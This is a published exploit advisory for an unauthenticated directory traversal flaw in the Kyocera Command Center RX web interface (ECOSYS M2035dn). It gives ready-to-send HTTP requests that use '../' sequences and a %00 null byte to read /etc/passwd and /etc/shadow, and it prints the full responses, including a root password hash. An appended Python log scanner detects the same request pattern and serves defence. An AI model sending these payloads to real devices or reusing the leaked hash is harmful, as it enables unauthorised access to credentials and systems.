Kyocera Command Center RX ECOSYS M2035dn Directory Traversal

2022.02.12
Credit: Luis Martinez
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-10
# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
# Tested Version: ECOSYS M2035dn
# Tested on: Linux
# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)

# Proof of Concept:
# 1.- Create a directory traversal payload
# 2.- Add a null byte to the end of the payload (%00)
# 3.- Send your request

Request 1:

GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 1:

HTTP/1.1 200 OK
Content-Length: 844
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 15:55:57 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
adm:x:4:4:adm:/var/adm:/bin/sh
lp:x:5:7:lp:/var/spool/lpd:/bin/sh
sync:x:6:8:sync:/bin:/bin/sync
shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
halt:x:8:10:halt:/sbin:/sbin/halt
mail:x:9:11:mail:/var/mail:/bin/sh
news:x:10:12:news:/var/spool/news:/bin/sh
uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
operator:x:12:0:operator:/root:/bin/sh
games:x:13:60:games:/usr/games:/bin/sh
ftp:x:15:14:ftp:/var/ftp:/bin/sh
man:x:16:20:man:/var/cache/man:/bin/sh
www:x:17:18:www-data:/var/www:/bin/sh
sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
proxy:x:19:21:proxy:/bin:/bin/sh
telnetd:x:20:22:proxy:/bin:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
ais:x:101:101:ais:/var/run/ais:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

Request 2:

GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
Cookie: rtl=0
Host: X.X.X.X
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
Accept: */*

Response 2:

HTTP/1.1 200 OK
Content-Length: 480
Upgrade: TLS/1.0
Accept-Encoding: identity
Date: Thu, 10 Feb 2022 16:10:16 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
Content-Type: image/jpeg

root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
bin:*:15873::::::
daemon:*:15873::::::
sys:*:15873::::::
adm:*:15873::::::
lp:*:15873::::::
sync:*:15873::::::
shutdown:*:15873::::::
halt:*:15873::::::
mail:*:15873::::::
news:*:15873::::::
uucp:*:15873::::::
operator:*:15873::::::
games:*:15873::::::
ftp:*:15873::::::
man:*:15873::::::
www:*:15873::::::
sshd:*:15873::::::
proxy:*:15873::::::
telnetd:*:15873::::::
backup:*:15873::::::
ais:*:15873::::::
nobody:*:15873::::::
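
A log-side check for the request pattern in the proof of concept above, as an added example that is not part of the original advisory: it percent-decodes each request target, flags an embedded null byte, and flags paths whose `..` segments climb above the web root. The log format, the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (sample data, not captured traffic). The second
# entry uses the request target shown in the advisory.
SAMPLE_LOG = [
    '10.0.0.5 "GET /js/jquery.js HTTP/1.1" 200',
    '10.0.0.9 "GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 200',
    '10.0.0.9 "GET /js/%2e%2e/%2e%2e/etc/shadow%00.jpg HTTP/1.1" 200',
    '10.0.0.7 "GET /js/../css/style.css HTTP/1.1" 200',
    '10.0.0.7 "GET /img/logo%00.png HTTP/1.1" 404',
]

REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')


def classify_target(target):
    """Return the set of findings for one HTTP request target."""
    path = target.split("?", 1)[0]
    raw = unquote_to_bytes(path)          # decode %xx before inspecting
    findings = set()
    if b"\x00" in raw:
        findings.add("null-byte")
        # A C string API stops at NUL, so judge the path it would open.
        raw = raw.split(b"\x00", 1)[0]
    depth = 0                             # directory depth below the web root
    for seg in raw.decode("latin-1").split("/"):
        if seg in ("", "."):
            continue
        depth = depth - 1 if seg == ".." else depth + 1
        if depth < 0:                     # climbed above the root
            findings.add("escapes-root")
            break
    return findings


def scan(lines):
    """Return (target, sorted findings) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (found := classify_target(m.group(1))):
            hits.append((m.group(1), sorted(found)))
    return hits


if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG):
        print(", ".join(found), "->", target)
```

A `..` that stays inside the root (`/js/../css/style.css`) is not flagged, which keeps the check quiet on legitimate relative links. The responses above also carry `Content-Type: image/jpeg` on a plain-text body, a mismatch that can serve as a second signal where response bodies are inspected.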

